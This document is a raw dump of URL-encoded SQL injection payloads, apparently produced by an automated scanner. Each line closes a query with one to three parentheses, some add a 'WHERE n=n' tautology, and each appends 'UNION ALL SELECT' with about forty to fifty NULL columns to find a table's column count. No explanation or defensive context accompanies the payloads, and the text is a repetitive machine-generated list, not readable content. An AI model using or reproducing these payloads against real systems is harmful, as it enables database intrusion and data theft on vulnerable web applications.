1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20WHERE%205125%3D5125%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20WHERE%206245%3D6245%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20WHERE%203464%3D3464%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20WHERE%203234%3D3234%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20WHERE%208205%3D8205%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20WHERE%203073%3D3073%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20WHERE%204915%3D4915%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20WHERE%208066%3D8066%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20WHERE%209856%3D9856%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20WHERE%207391%3D7391%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20WHERE%204843%3D4843%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20WHERE%202326%3D2326%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20WHERE%208321%3D8321%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%20WHERE%209387%3D9387%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 